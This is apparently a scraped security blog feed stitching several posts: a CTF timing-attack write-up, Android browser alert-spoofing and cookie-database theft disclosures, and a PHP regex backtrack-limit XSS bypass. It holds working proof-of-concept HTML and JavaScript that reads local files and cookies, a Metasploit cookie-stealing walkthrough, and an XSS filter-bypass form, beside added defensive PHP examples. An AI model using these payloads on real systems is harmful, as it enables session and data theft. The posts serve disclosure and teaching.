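// length of the correct prefix through its timing, beside a constant-time
// one, plus a small timer to confirm which of the two leaks.
declare(strict_types=1);

// The challenge password from the write-up, used here only as a stand-in.
const SECRET = 't1ckt0ck_b00m';

// Leaky check: stops at the first wrong character, and every matching
// character costs a simulated 1 ms of work, so the response time grows
// with the length of the correct prefix (the 0.1 s steps seen above).
function leakyCheck(string $guess, string $secret = SECRET): bool
{
    $n = min(strlen($guess), strlen($secret));
    for ($i = 0; $i < $n; $i++) {
        if ($guess[$i] !== $secret[$i]) {
            return false;
        }
        usleep(1000);   // simulated per-character processing
    }
    return $guess === $secret;
}

// Hardened check: hash_equals() runs in time independent of where the
// strings differ, and comparing fixed-length digests hides the length too.
function constantTimeCheck(string $guess, string $secret = SECRET): bool
{
    return hash_equals(hash('sha256', $secret, true), hash('sha256', $guess, true));
}

// Median wall-clock time of one check in microseconds (hrtime() needs PHP 7.3+).
function medianMicros(callable $check, string $guess, int $runs = 15): float
{
    $samples = [];
    for ($i = 0; $i < $runs; $i++) {
        $start = hrtime(true);
        $check($guess);
        $samples[] = (hrtime(true) - $start) / 1000;
    }
    sort($samples);
    return $samples[intdiv($runs, 2)];
}

// Regression test: a guess with a correct 3-character prefix must not cost
// measurably more than one that is wrong from the first character. Expect
// roughly 3000 us for the leaky check and only noise for the constant-time one.
$leakGap = medianMicros('leakyCheck', 't1cX') - medianMicros('leakyCheck', 'X');
$safeGap = medianMicros('constantTimeCheck', 't1cX') - medianMicros('constantTimeCheck', 'X');
printf("leaky check gap: %.0f us\nconstant-time check gap: %.0f us\n", $leakGap, $safeGap);
```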
<br />
Obviously I didn't know the length of the password. It could have been 100 or even 1000 characters long, so I decided to code a PHP script to automate the task and "GUESS" the password for me.<br />
<br />
Here is the code of that PHP script:<br />
<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=HkFCU2K6</span></blockquote>
It was a little fun coding this one. Here is the output it generated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUOgsFETZPsDCCz4042v6oiZpMkRFY580tOVz5ZmHoOYGvZEO0gsUwTImyBXkEUYkFcxJFy3m9Jsb_O-8yeK3mzlasmfD7Y35aQdw4M5r3LkzdAWCls9O3cFe58zpfEMyCZQBs9bf__Q/s1600/Screenshot_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIUOgsFETZPsDCCz4042v6oiZpMkRFY580tOVz5ZmHoOYGvZEO0gsUwTImyBXkEUYkFcxJFy3m9Jsb_O-8yeK3mzlasmfD7Y35aQdw4M5r3LkzdAWCls9O3cFe58zpfEMyCZQBs9bf__Q/s1600/Screenshot_2.png" /></a></div>
<br />
<br />
"t1ckt0ck_b00m" was the valid password and the MD5 hash of this password was the flag for this challenge.<br />
<br />
So that was it. It was really fun solving some of these challenges and it was indeed a good learning experience.<br />
<br />
<h4>
About The Author</h4>
Sajjad is a penetration tester and security enthusiast. He is a co-founder of CATRAX and REFLUXES, where he offers security testing services. </div>
Android Browser Kitkat Content Spoofing Vulnerability (Rafay, 2015-03-11)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfqGME988ML6XY_OXz8I3HhgIDf9c5YoY6o0p04QkugPLA4UtaFZordf8rscIEmVXxskCJxAFO3CnwKhTQwqrTqd9AQv2wVIFPx79KAshtdzgw2WWPAchm8ulVeVTToRE-724svn9KUcM/s1600/ANDROID.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfqGME988ML6XY_OXz8I3HhgIDf9c5YoY6o0p04QkugPLA4UtaFZordf8rscIEmVXxskCJxAFO3CnwKhTQwqrTqd9AQv2wVIFPx79KAshtdzgw2WWPAchm8ulVeVTToRE-724svn9KUcM/s1600/ANDROID.png" height="319" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The following is a low-risk vulnerability that was found a few months ago while testing the latest Android stock browser on Android KitKat. The issue is commonly referred to as a content spoofing vulnerability or dialog box spoofing vulnerability, which could be used to fake an alert message on a legitimate website.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In other words, I could display an alert box (of my choice) on the site of my choice, whereas in Chrome, Firefox and other browsers the alert box appears on the correct tab. </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<h4>
POC</h4>
<blockquote class="tr_bq">
<a onclick="test()">CLICK</a><br />
<script><br />
function test() {<br />
window.open('http://bing.com/');<br />
setTimeout(function(){ alert("HACKED"); }, 5000);<br />
}<br />
</script></blockquote>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Upon executing the above code, the alert box would be displayed on bing.com. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGhlfQp22cM65IMhAzkswj18s01DFZ9_hd6_G6Gc5vYFOz24HX7uP3MVKPpNW8gQUSlEh5X3O93IZi5UmFMYS7zxgsU-vvgNPHFWphLGUFpNtwFy-8_eSL1DVrcHeevle9lAm4yTMH6_g/s1600/unnamed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGhlfQp22cM65IMhAzkswj18s01DFZ9_hd6_G6Gc5vYFOz24HX7uP3MVKPpNW8gQUSlEh5X3O93IZi5UmFMYS7zxgsU-vvgNPHFWphLGUFpNtwFy-8_eSL1DVrcHeevle9lAm4yTMH6_g/s1600/unnamed.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<h4>
Technical Details</h4>
<div class="separator" style="clear: both;">
The issue resides inside the AOSP browser; more specifically, the WebView does not override the <a href="http://developer.android.com/reference/android/webkit/WebChromeClient.html" rel="nofollow" target="_blank">WebChromeClient.onJsAlert()</a> method, which is responsible for displaying the JavaScript alert box, so the browser is not able to attribute the alert to the correct tab.</div>
<div class="separator" style="clear: both;">
</div>
<h4>
Future Releases</h4>
<div class="separator" style="clear: both;">
I have recently reported another medium-risk issue present in the latest Android stock browser, which will be released once the issue is addressed by the Google team. </div>
</div>
Android Browser Cross Scheme Data Exposure + Intent Scheme Attack (Rafay, 2014-12-29)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBKerdVm7x70gdenaNiPwi_3oyQ1TY0r1D9dKMODbevutZgeEAbRPe5SKz06qKTE2z4rB_bUo1MowOWq2oTjiBREYmn5RWwsY7C45EJr8RZRhPmuQeb0SQZZ4KTLLz22dly8yLLK5O1zQ/s1600/_76596407_76592059.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBKerdVm7x70gdenaNiPwi_3oyQ1TY0r1D9dKMODbevutZgeEAbRPe5SKz06qKTE2z4rB_bUo1MowOWq2oTjiBREYmn5RWwsY7C45EJr8RZRhPmuQeb0SQZZ4KTLLz22dly8yLLK5O1zQ/s1600/_76596407_76592059.jpg" height="180" width="320" /></a></div>
<br />
<b>tl;dr </b>This post covers an issue present in the Android browser < 4.4 and several other Android browsers which allows an attacker to read the SQLite cookie database file, exposing all cookies. Along with it we also discuss a Cross Scheme Data Exposure attack in Android < 4.4.<br />
<h4>
Introduction</h4>
During my research on AOSP (Stock Browser) I found out that it is possible to open links to local files using the file:// protocol from a webpage by selecting "<b>Open Link in New tab</b>" from the context menu. This by itself does not represent a vulnerability unless there is a way to read local files and retrieve them remotely. However, what caught my attention is that this is not permitted by default in browsers such as Chrome, Firefox, Opera etc.<br />
<a name='more'></a><br />
The following screenshot demonstrates the error which is obtained when trying to access a local file from context menu.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifbU_XZKD3-CwcTIZhnKVBeYS63GQsH1fENOd15QJWXBhP2fHHyBqlIZZgdmEqNuhdAoOH061Nw8iD9aMLdPKd5lpFd4Jbbs3J4xp4n9WX40H13U-uOKDpzfaAOMIgrCY_uAunZgn2Itg/s1600/khoso.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifbU_XZKD3-CwcTIZhnKVBeYS63GQsH1fENOd15QJWXBhP2fHHyBqlIZZgdmEqNuhdAoOH061Nw8iD9aMLdPKd5lpFd4Jbbs3J4xp4n9WX40H13U-uOKDpzfaAOMIgrCY_uAunZgn2Itg/s1600/khoso.png" height="115" width="577" /></a></div>
<br />
<h4>
Attack Plan </h4>
In order to exploit this issue, the following was the attack plan we came up with:<br />
<br />
<b>i) </b>User visits <b>Attacker.com.</b><br />
<b>ii) Attacker.com </b>forces a download (exploit.html) on the victim's browser using the Content-Disposition header. The purpose of exploit.html would be to read local files and send them back to the attacker.<br />
<b>iii) </b>The victim opens a link by selecting "<b>Open Link in New tab</b>", which opens the local file exploit.html that was forced as a download. <br />
<b>iv) </b>Our file exploit.html would then read other local files and send them back to the attacker.<br />
<br />
In order to write an effective exploit for the attack, I teamed up with<b><a href="https://twitter.com/harupuxa" rel="nofollow" target="_blank"> Haru Sugiyama</a></b>, a security researcher from Japan. He came up with the following POC:<br />
<b><a href="http://133.242.134.241/firefox/test.html" rel="nofollow" target="_blank">http://133.242.134.241/firefox/test.html</a></b><br />
<br />
Upon accessing the above page from the Android browser, it would first force a download of the file "<b>exploit.html</b>". Both Firefox and the Android browser save files to '<b>/sdcard/Download/exploit.html</b>' in case an sdcard is available. The exploit.html file would then try reading the other local files. However, this was not as easy as it looked at first sight. Let's first talk about how the results on Android Gingerbread differed from Jelly Bean.<br />
<br />
<h4>
<b>Android Gingerbread: Observations</b></h4>
In the case of the Android Gingerbread emulator build 2.3 we are easily able to read other local files. This represents a vulnerability in the browser, as it effectively allows a website to perform cross-domain data theft, violating the <b>same-origin policy</b>. The impact however is not large, as roughly 11.4% of users now use Android Gingerbread and it is dying slowly, just like Windows XP.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAE9yGqAlz0CXVqVz8jrwTUHElvlyfzC-wBxSudn04SFMzYiNfb8bJPjMBCOaLgVthFSUHtwjErnEF2SPAItRDoGCbl8mASUO_Lysjea6_CVTfuvPicn_Nl3kY38MONRovW4PC2W87cl0/s1600/6bb44c670f3a1d59f7823d15ea6bf76d_b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAE9yGqAlz0CXVqVz8jrwTUHElvlyfzC-wBxSudn04SFMzYiNfb8bJPjMBCOaLgVthFSUHtwjErnEF2SPAItRDoGCbl8mASUO_Lysjea6_CVTfuvPicn_Nl3kY38MONRovW4PC2W87cl0/s1600/6bb44c670f3a1d59f7823d15ea6bf76d_b.jpg" height="257" width="577" /></a></div>
<br />
<br />
<h4>
<b>Android Jelly Bean: Observations</b></h4>
In the case of Jelly Bean we found that a local file was not able to read other local files. We then tried our old null byte trick and it worked like a charm.<br />
<br />
The following is the POC:<br />
<br />
<blockquote class="tr_bq">
<button onclick="exploit()">Read iframe</button><br />
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">Try \u0000</button><br />
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'></iframe><br />
<script><br />
function exploit() {<br />
var iframe = document.getElementsByTagName('iframe')[0];<br />
try{<br />
alert("Try to read local file.");<br />
alert("contentWindow:"+iframe.contentWindow);<br />
alert("document:"+iframe.contentWindow.document);<br />
alert("body:"+iframe.contentWindow.document.body);<br />
alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);<br />
} catch(e) {<br />
alert(e);<br />
}<br />
}<br />
</script></blockquote>
<br />
However, due to the discovery of <b><a href="http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html" target="_blank">CVE-2014-6041</a> </b>the nullbytes issue was already patched and the above exploit did not work on patched devices.<br />
<h4>
Intent URL Scheme Attack</h4>
<div>
Based upon the above findings it was concluded that in Android Jelly Bean access to local files was not an issue, since a local file could not read other local files. However, Joe Vennix from the Metasploit team came up with a stronger way to exploit it by abusing the intent scheme. The following paper -> <a href="http://www.mbsd.jp/Whitepaper/IntentScheme.pdf" rel="nofollow" target="_blank">http://www.mbsd.jp/Whitepaper/IntentScheme.pdf</a> describes a potential way of exploiting this issue. The following is the POC described in the paper:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxC0nMOxMptAVTU-_VgVfmbHxB5bxfmOYJPM5mCY9nhPkRiCDDbcr5veVZu_3FJ4FtAjYaJnaShwrl3dL-fZjAWIRrL5JFOyU-b2FB9AKSikc7jwRQPMC507VCZnQ2bhsNNDhD-G9IfM/s1600/khoso.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHxC0nMOxMptAVTU-_VgVfmbHxB5bxfmOYJPM5mCY9nhPkRiCDDbcr5veVZu_3FJ4FtAjYaJnaShwrl3dL-fZjAWIRrL5JFOyU-b2FB9AKSikc7jwRQPMC507VCZnQ2bhsNNDhD-G9IfM/s1600/khoso.png" height="78" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
The idea behind the attack vector is to save a cookie containing JavaScript code and trick the victim into opening the SQLite database file. Upon viewing it, the injected JavaScript would be executed in the context of the cookie file and would grab the rest of the cookies from the database file. Following is the basic POC which, when executed, would read the entire webviewCookiesChromium.db file.</div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<blockquote class="tr_bq">
<!doctype html><br />
<html><br />
<head><meta name="viewport" content="width=device-width, user-scalable=no" /></head><br />
<body style='width:100%;font-size: 16px;'><br />
<a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db'><br />
Redirecting... To continue, tap and hold here, then choose "Open in a new tab"<br />
</a><br />
<script><br />
document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';<br />
</script><br />
</body><br />
</html></blockquote>
<br />
Joe has created a <a href="https://github.com/rapid7/metasploit-framework/pull/4461" rel="nofollow" target="_blank">Metasploit module</a> which automates the process of stealing the cookies and sending them back to you. Since the db file also contains HttpOnly cookies, this attack is quite dangerous.<br />
<br />
<h4>
Steps to Reproduce with Metasploit</h4>
<br />
<b><br /></b>
The following screenshots would walk you through the process of exploiting and retrieving the cookies:<br />
<b><br /></b>
<b>Step 1 - Setting up the Module</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3viYOYj2rxpPrZv6A_8JWYvlFqIsfCaOieJ0Z359MIkMB8wCR8ZEsWqTDBXIS0Cny6ZYq19GwIDlIgPE5Qj5nFRN5_7f8zD_6DLJfYeLUJjGXirOQJjBKrEVwwMdGcRGnW6dRirKOmd4/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3viYOYj2rxpPrZv6A_8JWYvlFqIsfCaOieJ0Z359MIkMB8wCR8ZEsWqTDBXIS0Cny6ZYq19GwIDlIgPE5Qj5nFRN5_7f8zD_6DLJfYeLUJjGXirOQJjBKrEVwwMdGcRGnW6dRirKOmd4/s1600/1.png" height="86" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<b>Step 2 - Stealing The Cookies</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
All you need to do is sit back and watch the cookies come in. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb8489ZwTJpTNOj3BvoRHxZciP3hk2Cjx1a8suklhAjAhJMMwuYA9sYHSY8l-vAwNcHEScs7uZ6Tho3wueZ3ZNbGXRBwkZTkZ5-oQVPlfLYGZUEKKBwGWf0emTkJ3mgTH5UPsgX_hTbnY/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb8489ZwTJpTNOj3BvoRHxZciP3hk2Cjx1a8suklhAjAhJMMwuYA9sYHSY8l-vAwNcHEScs7uZ6Tho3wueZ3ZNbGXRBwkZTkZ5-oQVPlfLYGZUEKKBwGWf0emTkJ3mgTH5UPsgX_hTbnY/s1600/2.png" height="402" width="577" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 3 - Enjoy</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW1chOngsKLA5R45XwqWxNQ4-YkogiHL7JoCTqAQIAtLvpVRnEFJiOK2K42l6971-8kdUFlmD9VLUsxdfoSEsX0k1poNLT5xaIVsE8sgnQecVQoCD3givPErlFAO9WBhUd5irFayTvSfg/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW1chOngsKLA5R45XwqWxNQ4-YkogiHL7JoCTqAQIAtLvpVRnEFJiOK2K42l6971-8kdUFlmD9VLUsxdfoSEsX0k1poNLT5xaIVsE8sgnQecVQoCD3givPErlFAO9WBhUd5irFayTvSfg/s1600/images.jpg" /></a></div>
<br />
<div>
<h4>
Patch</h4>
</div>
<div>
Access to the data directory was tightened back in Feb 2014; however, due to the Android patch policies, the patch did not make it to most vendors. </div>
<div>
<h4>
Credits</h4>
</div>
<div>
I would like to thank <u>Tod Beardsley</u> and <u>Joe Vennix</u> from the Metasploit team for their extensive support with analyzing the issue and helping to coordinate with Google effectively, as well as <u>Haru Sugiyama </u>for his help and support.<br />
<br /></div>
</div>
Bad Meets evil - PHP meets Regular Expressions (Rafay, 2014-12-25)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7HER88k3vwKWl5guhyEmN4abQ-TOI0skeTFE2LripANyGD4oHpUYMTv27yUNn0u15EyxZ9l7tYXfCi4dVRaRQGqru-6JmXPwK2Ie-mq6lLPRzN3jnmVl1xUGxx7B6iU-303ZEMk3IZsE/s1600/5836012758_17e9e3438a_b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7HER88k3vwKWl5guhyEmN4abQ-TOI0skeTFE2LripANyGD4oHpUYMTv27yUNn0u15EyxZ9l7tYXfCi4dVRaRQGqru-6JmXPwK2Ie-mq6lLPRzN3jnmVl1xUGxx7B6iU-303ZEMk3IZsE/s1600/5836012758_17e9e3438a_b.jpg" height="640" width="577" /></a></div>
<br />
This article briefly discusses why Regular Expressions might not be suitable for filters, and how things can turn miserably bad when PHP is used with Regular Expressions. The post then continues with the write-up of a relevant scenario-based challenge, and finally concludes with the author's opinion on the topic.<br />
<a name='more'></a><br />
<h4 style="text-align: left;">
Common pitfalls of Regular expressions</h4>
<div style="text-align: left;">
RegEx (Regular Expressions) are commonly used for pattern matching, searching and replacing, which is handy for string manipulation in the back-end programming languages that support them. In reality, there are a ton of filters <b>[1] </b>which rely heavily upon RegEx to filter out malicious inputs.<br />
<br />
We have already witnessed <b>[2]</b> why RegEx might not be considered a good idea. However, one might argue that it is the programmers' fault (or rather their choice of options): they do not consider all the possible test cases for an attack surface scenario. I simply couldn't disagree with this statement. In fact, Microsoft's current XSS filter <b>[3]</b> is a good example of it. Following are some of the problems:<br />
<br />
<i><b>Problem#1:</b></i> Under the hood, the filter currently employs a very long RegEx which, surprisingly, has no public bypasses available. But one should not forget that it actually evolved from previous vulnerable versions, and one really must have the patience to write such a tedious RegEx. <br />
<br />
<i><b>Problem#2:</b></i> The second problem is that even with a functional RegEx, it could still lead to a different vulnerability. Yes, I'm talking about ReDoS (Regular Expression Denial of Service), an attack that surfaces in badly constructed RegEx, wherein attackers could compromise the availability of the application with a specially crafted input. <br />
<br />
In the long run, from the programmer's perspective, it is tedious for developers to handle both functionality and security at once. Therefore, we conclude that RegEx (Regular Expressions) should be considered evil when heavily used in filters.</div>
<h4 style="text-align: left;">
PHP + RegEx = ?</h4>
<div style="text-align: left;">
PHP itself is not bad; however, when combined with RegEx it becomes bad. Most of the RegEx functions used in PHP (i.e. preg_*) are based upon the <b>PCRE library</b>. The engine is not only deficient in terms of performance, but it also opens a potential gateway to ReDoS vulnerabilities.<br />
<br />
As we can see from a ReDoS issue in PHP's well-known framework CodeIgniter <b>[4]</b>, a harmless-looking RegEx (e.g. `/[a-z]+=/`) can cause serious performance damage. More importantly, there is a fatal design flaw. In order to prevent resource exhaustion, PHP provides an option called <b>pcre.backtrack_limit</b>. What it does is limit the number of backtracks (excessive backtracking is the usual cause of ReDoS). But what if the number of backtracks reaches the limit? Well, PHP just doesn't care: the match is abandoned and nothing forces the caller to notice. In other words, it is possible to evade specific protections when the conditions are met.</div>
<h4 style="text-align: left;">
The write-up</h4>
<div style="text-align: left;">
<br />
In order to demonstrate how serious the problem could be, I ended up creating a mini XSS puzzle for the kcal.pw series. Here is the sample code for this puzzle:</div>
<blockquote class="tr_bq">
$xss = $_POST['xss'];<br />
if (preg_match('/<(?:\w+)\W+?[\w]/', $xss)) {<br />
echo '<p>I don\'t think so</p>';<br />
} else {<br />
echo $xss;<br />
}</blockquote>
<div style="text-align: left;">
<br />
Let's take a look at the following RegEx and see what it does: `/<(?:\w+)\W+?[\w]/`<br />
<br />
It detects any presence of an open tag, followed by any potential attributes, separators and so on. Although the RegEx looks simple, it is technically sufficient for preventing XSS in an HTML context. If you look closely, you will find that the RegEx uses non-greedy matching, which requires backtracking. As mentioned before, PHP has a default backtrack limit (pcre.backtrack_limit, 100000). However, PHP favours "fail silently", which makes preg_match simply return false instead of throwing an exception when the input reaches the limit. As a result, submitting a long enough payload will bypass the filter.<br />
<br />
Let's try using the preg_match function to test the regular expression with a large number of A's:</div>
<blockquote class="tr_bq">
var_dump(preg_match('/<(?:\w+)\W+?[\w]/', '<a/'.str_repeat('\\', 1000000).'/a'));</blockquote>
<div style="text-align: left;">
<br />
The proof of concept is simple: it simulates the input being matched against the vulnerable RegEx (A being repeated 1000000 times), and it does return false.<br />
<br />
<h4>
Proof Of Concept</h4>
</div>
The following is a complete proof of concept that would generate alert(1) on the challenge domain:<br />
<blockquote>
<div dir="ltr" style="text-align: left;" trbidi="on">
<form action="http://s30003-101809-vkp.tarentum.hack.me/index.php" method="post"><br />
<textarea style="display: none" name="xss"></textarea><br />
</form><br />
<script><br />
document.forms[0].xss.value = '<script' + Array(999999).join('/') + '>alert(1)<\/script>';<br />
document.forms[0].submit();<br />
</script></div>
</blockquote>
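<div style="text-align: left;">
<br />
The root cause above is that `if (preg_match(...))` treats the `false` returned on a PCRE failure exactly like `0` (no match), so the payload sails through. The following is an added example, not code from the original post or the kcal.pw challenge, showing the same filter rebuilt to fail closed: it compares the return value with `===`, checks preg_last_error() after every call, and caps the input length before the engine ever sees it. It assumes PHP 8.0 or later for preg_last_error_msg(); the function names and the 4096-byte cap are this example's own choices.<br />
</div>

```php
<?php
declare(strict_types=1);

// Added example (not from the original post): a default-deny wrapper around
// preg_match() so that any PCRE failure (backtrack limit, JIT stack limit,
// bad UTF-8, ...) is treated as a rejection instead of a pass.
// Assumes PHP 8.0+ (preg_last_error_msg). TAG_PATTERN is the write-up's
// regex; MAX_INPUT_LEN and the function names are this example's own.

const TAG_PATTERN   = '/<(?:\w+)\W+?[\w]/';
const MAX_INPUT_LEN = 4096; // assumption: plenty for a comment field

/**
 * Returns true only when preg_match() ran to completion AND found no
 * tag-like sequence. Everything else, including engine failure, is "unsafe".
 */
function is_tag_free(string $input, int $maxLen = MAX_INPUT_LEN): bool
{
    // Cheap first line of defence: bound the work handed to the engine.
    if (strlen($input) > $maxLen) {
        return false;
    }

    $result = preg_match(TAG_PATTERN, $input);

    // preg_match() returns int(1) on match, int(0) on no match, and false on
    // failure. A truthiness test conflates false with 0: that is the bypass.
    if ($result === false || preg_last_error() !== PREG_NO_ERROR) {
        // e.g. PREG_BACKTRACK_LIMIT_ERROR or PREG_JIT_STACKLIMIT_ERROR
        error_log('tag filter: PCRE failure: ' . preg_last_error_msg());
        return false; // fail closed
    }

    return $result === 0;
}

/** The challenge's echo, rebuilt on top of the fail-closed check. */
function render_untrusted(string $input): string
{
    return is_tag_free($input) ? $input : '<p>I don\'t think so</p>';
}

// Constructed inputs: a benign comment and the write-up's long payload shape.
$benign  = 'plain text, no markup here';
$payload = '<script' . str_repeat('/', 999999) . '>alert(1)</script>';

// 1. Original challenge logic: a false from preg_match() counts as "no match".
$original = preg_match(TAG_PATTERN, $payload) ? 'blocked' : 'reflected';
$pcreMsg  = preg_last_error_msg();

// 2. Hardened check with the length cap: never reaches the engine.
$capped = render_untrusted($payload) === $payload ? 'reflected' : 'blocked';

// 3. Hardened check with the cap disabled: the engine either matches the tag
//    or reports an error, and both paths return false (blocked either way).
$uncapped = is_tag_free($payload, PHP_INT_MAX) ? 'reflected' : 'blocked';

printf("benign input        : %s\n", render_untrusted($benign) === $benign ? 'reflected' : 'blocked');
printf("original filter     : %s (preg_last_error: %s)\n", $original, $pcreMsg);
printf("hardened, capped    : %s\n", $capped);
printf("hardened, no cap    : %s\n", $uncapped);
```

<div style="text-align: left;">
Whether the original filter prints "reflected" depends on the PHP build (pcre.backtrack_limit, pcre.jit and PCRE2 version), which is exactly why the hardened version does not rely on that outcome: it checks the engine's status on every call and refuses oversized input up front. Running it from the command line with <b>php example.php</b> is enough to compare the three paths on a given installation.<br />
</div>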
<h4 style="text-align: left;">
Conclusion</h4>
<div style="text-align: left;">
<br />
The suggestion for defense is to use RegEx only when absolutely necessary. More importantly, avoid writing bad RegEx. Although there are some tools which claim to analyze potential ReDoS problems, the best practice is again to substantially limit the use of RegEx. Finally, here is the take-away (which is also my rule of thumb): <br />
<br />
If a filter relies too heavily on a RegEx, then it may well fail at its job in terms of security!<br />
<br />
<h4>
About The Author</h4>
<br />
This article has been written by "<b>File Descriptor</b>", who prefers to be called "XSS Jigsaw" instead of his real name, which he prefers to keep secret. FD has decided to dedicate his life to creating and solving XSS challenges, and that, in my opinion, is what a hacker really is: a problem-solving expert. You can follow him at <a href="http://twitter.com/filedescriptor" rel="nofollow" target="_blank">@filedescriptor</a><br />
<b><br /></b>
<b>References</b><br />
<b><br /></b>
1. http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/<br />
2. http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags<br />
3. http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html<br />
4. https://github.com/bcit-ci/CodeIgniter/issues/3123</div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/bad-meets-evil-php-meets-regular.html";
</script>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-43033920408016939362014-12-14T11:40:00.002-08:002020-05-27T14:34:26.366-07:00Common Attacks Against Modems<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEierJYy3k5zg10cxIx-ZDZNkk7iMDj4Xd7JlbA-N5-3ofTnORmEo2_L5M7uxUyYoIhS3iyFTVc0jE0WnbnJ2HYWUHUMCVS-e_EzRrk7Aw4AWPlzYWLNooMXO3CV7eKDSuO72__HdjGyK50/s1600/T-DSL_Modem.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEierJYy3k5zg10cxIx-ZDZNkk7iMDj4Xd7JlbA-N5-3ofTnORmEo2_L5M7uxUyYoIhS3iyFTVc0jE0WnbnJ2HYWUHUMCVS-e_EzRrk7Aw4AWPlzYWLNooMXO3CV7eKDSuO72__HdjGyK50/s1600/T-DSL_Modem.jpg" height="313" width="320" /></a></div>
<h2 style="text-align: left;">
0x01: Introduction to Modems</h2>
<div style="text-align: left;">
